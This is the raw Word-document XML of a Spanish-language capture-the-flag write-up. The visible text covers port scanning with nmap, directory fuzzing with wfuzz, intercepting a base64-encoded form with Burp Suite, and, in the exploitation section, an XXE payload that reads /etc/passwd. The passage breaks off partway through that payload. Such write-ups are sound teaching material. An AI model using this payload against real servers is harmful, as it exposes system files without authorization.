0AFAAGAAgAAAAhAEPW1Inf&#10;AAAACwEAAA8AAAAAAAAAAAAAAAAA1wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADj&#10;BQAAAAA=&#10;" fillcolor="black [3213]" strokecolor="#09101d [484]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6B0FB606" w14:textId="586BD937" w:rsidR="0051639D" w:rsidRPr="00A56118" w:rsidRDefault="007A24E7" w:rsidP="007A24E7">
                      <w:pPr>
                        <w:jc w:val="center"/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AC76FF6" wp14:editId="501F361D">
                            <wp:extent cx="270934" cy="187375"/>
                            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                            <wp:docPr id="1749275129" name="Imagen 1749275129" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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V="1">
                                      <a:off x="0" y="0"/>
                                      <a:ext cx="283210" cy="1958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  <w:t xml:space="preserve">  </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00A56118">
                        <w:rPr>
                          <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                          <w:sz w:val="36"/>
                          <w:szCs w:val="36"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>Para más contenido visita mi canal de YouTube: HackeMate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59A2A35" w14:textId="1CD5E41A" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46521DF4" w14:textId="1A7BA7A0" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5753E64B" w14:textId="2BFE88FD" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B69E1E" w14:textId="36AA89C5" w:rsidR="0051639D" w:rsidRDefault="0051639D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B76243" w14:textId="7F30A80D" w:rsidR="00FA6809" w:rsidRPr="00206A93" w:rsidRDefault="00FA6809" w:rsidP="00FA6809">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc138803585"/>
      <w:r w:rsidRPr="00206A93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Análisis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1959B6A4" w14:textId="44BD49A7" w:rsidR="00FA6809" w:rsidRDefault="00F5411F" w:rsidP="00FA6809">
      <w:r>
        <w:t xml:space="preserve">Utilizamos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para analizar los puertos abiertos con el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48521F1E" w14:textId="59FC888A" w:rsidR="00F5411F" w:rsidRDefault="00F5411F" w:rsidP="00FA6809">
      <w:r w:rsidRPr="00F5411F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="480EFBE3" wp14:editId="467C65E7">
            <wp:extent cx="5496560" cy="1172845"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1745790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90558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9894" b="89753" l="6407" r="94150">
                                  <a14:foregroundMark x1="6407" y1="24382" x2="9749" y2="53357"/>
                                  <a14:foregroundMark x1="93872" y1="28622" x2="94150" y2="392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2892" t="11335" r="2224" b="11630"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5503379" cy="117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427C4" w14:textId="77777777" w:rsidR="00F71477" w:rsidRPr="00F71477" w:rsidRDefault="00F71477" w:rsidP="00F71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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PORT   STATE SERVICE REASON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7296658A" w14:textId="77777777" w:rsidR="00F71477" w:rsidRPr="00F71477" w:rsidRDefault="00F71477" w:rsidP="00F71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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     syn-ack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087ECBA1" w14:textId="0EC24916" w:rsidR="00F5411F" w:rsidRDefault="00F71477" w:rsidP="00F71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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open  http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    syn-ack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71477">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F29209" w14:textId="77777777" w:rsidR="00A24C53" w:rsidRPr="00795925" w:rsidRDefault="00A24C53" w:rsidP="00F71477">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BA25880" w14:textId="098BB28A" w:rsidR="00F71477" w:rsidRDefault="00F71477" w:rsidP="00F71477">
      <w:r w:rsidRPr="00F71477">
        <w:t>Si entramos al Puerto 80 v</w:t>
      </w:r>
      <w:r>
        <w:t>eremos lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50464C66" w14:textId="15E37EFF" w:rsidR="00F71477" w:rsidRDefault="00A24C53" w:rsidP="00A24C53">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C53">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="538BC4CB" wp14:editId="20FEF5DC">
            <wp:extent cx="5400040" cy="3445510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="53413120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31204" name="Imagen 1" descr="Interfaz de usuario gráfica, Sitio web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92A5" w14:textId="77777777" w:rsidR="00A24C53" w:rsidRPr="00F71477" w:rsidRDefault="00A24C53" w:rsidP="00A24C53"/>
    <w:p w14:paraId="13987C60" w14:textId="1A8A941A" w:rsidR="00F71477" w:rsidRDefault="0087161E" w:rsidP="00F71477">
      <w:r>
        <w:t xml:space="preserve">Ahora, lo que podemos hacer es intentar averiguar si existen rutas/vías potenciales para encontrar algún directorio activo. Para ello, utilizaremos la herramienta de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA586B6" w14:textId="32E2A6A1" w:rsidR="0087161E" w:rsidRDefault="007313E7" w:rsidP="00F71477">
      <w:r w:rsidRPr="007313E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1F385E" wp14:editId="3D727F0F">
            <wp:extent cx="5476240" cy="644264"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="155857697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76978" name="Imagen 1" descr="Interfaz de usuario gráfica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9508" b="89508" l="5453" r="95933">
                                  <a14:foregroundMark x1="5453" y1="26557" x2="9519" y2="54098"/>
                                  <a14:foregroundMark x1="95933" y1="50820" x2="95933" y2="5082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788" t="10675" r="2258" b="9258"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495546" cy="64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54A1" w14:textId="7EE4234B" w:rsidR="00611C6B" w:rsidRDefault="00611C6B" w:rsidP="00F71477">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y el resultado es el siguiente:”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666E351" w14:textId="75191188" w:rsidR="00611C6B" w:rsidRDefault="00611C6B" w:rsidP="00F71477">
      <w:r w:rsidRPr="00611C6B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DC2956D" wp14:editId="16D0AF0B">
            <wp:extent cx="5400040" cy="1494155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1031057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571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E96F" w14:textId="77777777" w:rsidR="00611C6B" w:rsidRDefault="00611C6B" w:rsidP="00F71477"/>
    <w:p w14:paraId="1FEA895A" w14:textId="436C546C" w:rsidR="00611C6B" w:rsidRDefault="00611C6B" w:rsidP="00F71477">
      <w:r>
        <w:t>Al tener una respuesta 301 podemos intentar averiguar qué es lo que devuelve al ingresar</w:t>
      </w:r>
      <w:r w:rsidR="004D731F">
        <w:t>lo manualmente desde el navegador:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573543E8" w14:textId="7E9D1BEA" w:rsidR="004D731F" w:rsidRDefault="004D731F" w:rsidP="004D731F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004D731F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C44D019" wp14:editId="49B69E57">
            <wp:extent cx="4254500" cy="3942080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="581453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53918" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="6927"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4254719" cy="394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D0CF3" w14:textId="77777777" w:rsidR="004D731F" w:rsidRDefault="004D731F" w:rsidP="004D731F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF47994" w14:textId="63111401" w:rsidR="007313E7" w:rsidRDefault="004D731F" w:rsidP="00F71477">
      <w:r>
        <w:t>Ahora</w:t>
      </w:r>
      <w:r w:rsidR="00274609">
        <w:t>, visualizaremos el contenido del fichero README.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31895C0F" w14:textId="003250E6" w:rsidR="00274609" w:rsidRDefault="00274609" w:rsidP="00274609">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00274609">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="255648F8" wp14:editId="78297DBD">
            <wp:extent cx="5400040" cy="1318895"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="819641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415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FE1" w14:textId="77777777" w:rsidR="00274609" w:rsidRDefault="00274609" w:rsidP="00274609">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629B452C" w14:textId="633FE328" w:rsidR="00274609" w:rsidRDefault="00EF35DB" w:rsidP="00274609">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Visualizamos que el desarrollador ha tenido 4 tareas por hacer, pero solo ha cumplido 2</w:t>
      </w:r>
      <w:r w:rsidR="00EC0C62">
        <w:t>, es decir, l</w:t>
      </w:r>
      <w:r>
        <w:t>a primera y tercera le faltó culminar. Entonces ingresaremos al portal para analizar lo que está pasando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC80FB" w14:textId="0CCDF997" w:rsidR="00EF35DB" w:rsidRDefault="006E2B5B" w:rsidP="00274609">
      <w:r w:rsidRPr="006E2B5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54ECC330" wp14:editId="6840E3D5">
            <wp:extent cx="5400040" cy="640715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="801218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187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34E2" w14:textId="186552D9" w:rsidR="006E2B5B" w:rsidRDefault="006E2B5B" w:rsidP="00274609">
      <w:r w:rsidRPr="006E2B5B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02280143" wp14:editId="44081E1F">
            <wp:extent cx="5400040" cy="1389380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="191671031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10314" name="Imagen 1" descr="Captura de pantalla de un celular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42B" w14:textId="77777777" w:rsidR="006E2B5B" w:rsidRDefault="006E2B5B" w:rsidP="00274609"/>
    <w:p w14:paraId="095DB507" w14:textId="36B16DD1" w:rsidR="004D731F" w:rsidRDefault="00FB6137" w:rsidP="00F71477">
      <w:r>
        <w:t>Ahora, si testeamos los inputs de la plataforma vemos que se está guardando e imprimiendo los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49655020" w14:textId="1F5BDAA1" w:rsidR="00FB6137" w:rsidRDefault="00B27B15" w:rsidP="00F71477">
      <w:r w:rsidRPr="00B27B15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21DF0C8F" wp14:editId="2C7896D3">
            <wp:extent cx="5400040" cy="2653030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2129649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49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5AF5" w14:textId="77777777" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477"/>
    <w:p w14:paraId="0914CAB0" w14:textId="31358E45" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477">
      <w:r>
        <w:t xml:space="preserve">Ahora, veremos qué datos está tramitando mientras se pulsa el botón de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B27B15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Para ello, utilizaremos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C9A204" w14:textId="79B92895" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477">
      <w:r w:rsidRPr="00B27B15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F56C939" wp14:editId="7458E453">
            <wp:extent cx="4875908" cy="3233213"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5715"/>
            <wp:docPr id="171660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3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6024" cy="32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9F0E" w14:textId="77777777" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477"/>
    <w:p w14:paraId="5ECF7049" w14:textId="40BE7731" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477">
      <w:r>
        <w:t xml:space="preserve">Daremos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> derecho y mandaremos al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para ver la respuesta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A368323" w14:textId="1215BEB3" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477">
      <w:r w:rsidRPr="00B27B15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6741914C" wp14:editId="51B9F0E1">
            <wp:extent cx="5400040" cy="3445510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1318952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5282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96BF" w14:textId="77777777" w:rsidR="00B27B15" w:rsidRDefault="00B27B15" w:rsidP="00F71477"/>
    <w:p w14:paraId="481DFCAA" w14:textId="0301CA6A" w:rsidR="00A6207F" w:rsidRDefault="00A6207F" w:rsidP="00F71477">
      <w:r>
        <w:t xml:space="preserve">Identificamos que el valor de la data está en base64, por lo que si lo desciframos con </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6207F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>base64 -d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el resultado es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450F1D9" w14:textId="119005FB" w:rsidR="00A6207F" w:rsidRDefault="00A6207F" w:rsidP="00F71477">
      <w:r w:rsidRPr="00A6207F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D421811" wp14:editId="5C0BDBAF">
            <wp:extent cx="5622601" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="180014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43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4962" cy="6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B4EB" w14:textId="0B9A46B2" w:rsidR="00FA6809" w:rsidRPr="00206A93" w:rsidRDefault="00FA6809" w:rsidP="00FA6809">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc138803586"/>
      <w:r w:rsidRPr="00206A93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explotación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="771BEBA2" w14:textId="065C5E4B" w:rsidR="000C007C" w:rsidRDefault="000C007C" w:rsidP="00FA6809">
      <w:r w:rsidRPr="000C007C">
        <w:t>En esta etapa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, utilizaremos un XXE desde la página oficial de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidRPr="00FA4315">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/xxe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEDEF3A" w14:textId="77777777" w:rsidR="006F6DC0" w:rsidRDefault="006F6DC0" w:rsidP="00FA6809"/>
    <w:p w14:paraId="6B15C7A6" w14:textId="1077B06D" w:rsidR="000C007C" w:rsidRDefault="006F6DC0" w:rsidP="00FA6809">
      <w:r w:rsidRPr="006F6DC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB81279" wp14:editId="7ADA242E">
            <wp:extent cx="5595098" cy="3114675"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="113825671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56713" name="Imagen 1" descr="Diagram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9594" cy="311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F09E" w14:textId="77777777" w:rsidR="006F6DC0" w:rsidRDefault="006F6DC0" w:rsidP="00FA6809"/>
    <w:p w14:paraId="56FE088E" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xml  version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9B0839" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58976E56" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bugreport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4470CE35" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A38F7C" w14:textId="77777777" w:rsidR="000C007C" w:rsidRPr="000C007C" w:rsidRDefault="000C007C" w:rsidP="000C007C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;test&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C007C">
        <w:rPr>
